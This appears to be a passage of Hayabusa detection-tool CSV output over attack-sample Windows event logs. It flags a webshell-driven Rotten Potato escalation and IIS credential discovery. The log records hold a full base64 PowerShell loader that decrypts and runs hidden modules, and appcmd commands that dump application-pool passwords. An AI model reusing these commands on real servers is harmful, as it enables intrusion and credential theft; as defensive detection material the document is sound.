365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:01.864 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:01.864 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Exec,Suspicious Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_enc_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation_sysmon/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,medium,,Base64 Encoded Command Line Param Indicator,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_base64_cmdline_param.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Persis,Webshell Hacking Activity Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_webshell_hacking.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.000 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.110 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.190 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.270 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3240 | PGUID: 
365ABB72-3D6D-5CEB-0000-0010D763FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.350 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.581 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.661 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.731 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2448 | PGUID: 
365ABB72-3D6D-5CEB-0000-00104474FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.811 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.891 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.971 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG